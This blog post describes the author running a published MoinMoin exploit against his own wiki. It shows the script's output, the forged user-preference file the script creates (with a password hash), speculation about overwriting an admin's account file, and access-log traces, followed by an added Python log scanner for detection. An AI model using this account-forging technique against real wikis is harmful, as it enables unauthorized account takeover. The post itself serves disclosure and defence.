Wednesday, February 20, 2008

MoinMoin Vulns



Courtesy of a Secunia feed I ran across the vulns in MoinMoin, which is my wiki of choice for work or play. I don't allow any authenticated users to edit pages or upload files (apart from me), but I was paranoid enough to take my wiki down for a bit until I've had a chance to understand the issues more, or until Ubuntu releases a package.

Update
franz-g4:~ mdfranz$ python hackmoin.py
MoinMoin host: i.e: http://127.0.0.1:8000/
MoinMoin host ( include http and /): http://www.threatmind.net/secwiki/
Ok, the file: README was created, and you can logging setting the cookie MOIN_ID='README' in your browser.


Yeah, the exploit does indeed create (overwrite?) a README file in your data/user directory that looks like this:

aliasname=ilikecolombianpeople
css_url=
date_fmt=
datetime_fmt=
disabled=0
edit_on_doubleclick=0
edit_rows=20
editor_default=text
editor_ui=freechoice
email=just@nonrootuser.co
enc_password={SHA}hzAn1bupZwrTEQuFWlZA3TsEcVc=
language=
last_saved=1203553839.72
mailto_author=0
name=nonroot
quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si
remember_last_visit=0
remember_me=1
show_fancy_diff=1
show_nonexist_qm=0
show_page_trail=1
show_toolbar=1
show_topbottom=0
subscribed_pages=
theme_name=modern
tz_offset=0
want_trivial=0
wikiname_add_spaces=0

So the question is: so what? Can this be used to erase/reset the password of the Admin user? Not sure. But I did discover a shitload of user preference files in my wiki, yikes! I'm sure they are harmless... I guess the key issue is whether this exploit would allow you to overwrite an existing admin user's file (through the web UI you can't create a new user for one that already exists, IIRC).

It would definitely appear that if you can guess the time-based filename (etime.time.anothertime) you could.

And here is what the exploit looks like in your logs:

stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:29:47 +0000] "POST /secwikiUserPreferences/ HTTP/1.1" 404 229 "-" "Python-urllib/2.4" "-"
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:30:10 +0000] "POST /secwikiUserPreferences/ HTTP/1.1" 404 229 "-" "Python-urllib/2.4" "-"
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:30:39 +0000] "POST /secwiki/UserPreferences/ HTTP/1.1" 200 23341 "-" "Python-urllib/2.4" "-

And yeah, it took me 3 times because I kept forgetting the slash (as you can see) and because I'm a "jackass" (to use tqbf's favorite expletive).
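As an added detection example (my code, not from the post or from MoinMoin), here is a small Python log scanner for the pattern shown in those three lines: scripted POSTs to a UserPreferences action with no Referer, grouped per source host, so a 404-then-200 sequence from one client stands out. The sample input embeds the post's three log lines (trailing field normalised) plus one constructed benign line; the field names and the suspicion heuristic are my assumptions.

```python
import re
from collections import defaultdict

# Apache combined-log pattern; the page's lines carry an extra trailing "-"
# field, so we match only the leading fields we need (re.match, not fullmatch).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: the three requests quoted in the post plus one benign browser hit.
SAMPLE_LOG = """\
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:29:47 +0000] "POST /secwikiUserPreferences/ HTTP/1.1" 404 229 "-" "Python-urllib/2.4" "-"
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:30:10 +0000] "POST /secwikiUserPreferences/ HTTP/1.1" 404 229 "-" "Python-urllib/2.4" "-"
stinkmonkey.cable.rcn.com - - [21/Feb/2008:00:30:39 +0000] "POST /secwiki/UserPreferences/ HTTP/1.1" 200 23341 "-" "Python-urllib/2.4" "-"
203.0.113.5 - - [21/Feb/2008:00:31:02 +0000] "GET /secwiki/FrontPage HTTP/1.1" 200 5123 "http://www.threatmind.net/secwiki/" "Mozilla/5.0" "-"
"""

def parse(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(rec):
    """Heuristic (assumption): a POST aimed at a UserPreferences action, sent by a
    scripting library with no Referer. Matching on the path suffix also catches
    the mistyped /secwikiUserPreferences/ attempts that 404'd."""
    return (rec["method"] == "POST"
            and rec["path"].rstrip("/").endswith("UserPreferences")
            and rec["referer"] == "-"
            and rec["ua"].startswith("Python-urllib"))

def scan(text):
    """Group suspicious requests per source host: host -> [(timestamp, path, status)]."""
    hits = defaultdict(list)
    for line in text.splitlines():
        rec = parse(line)
        if rec and is_suspicious(rec):
            hits[rec["host"]].append((rec["ts"], rec["path"], rec["status"]))
    return dict(hits)

def hosts_with_success(hits):
    """Hosts whose scripted POST eventually got a 200, i.e. probably reached the action."""
    return sorted(h for h, evs in hits.items() if any(s == "200" for _, _, s in evs))

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for host, events in found.items():
        print(host, *events, sep="\n  ")
    print("reached UserPreferences:", hosts_with_success(found))
```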
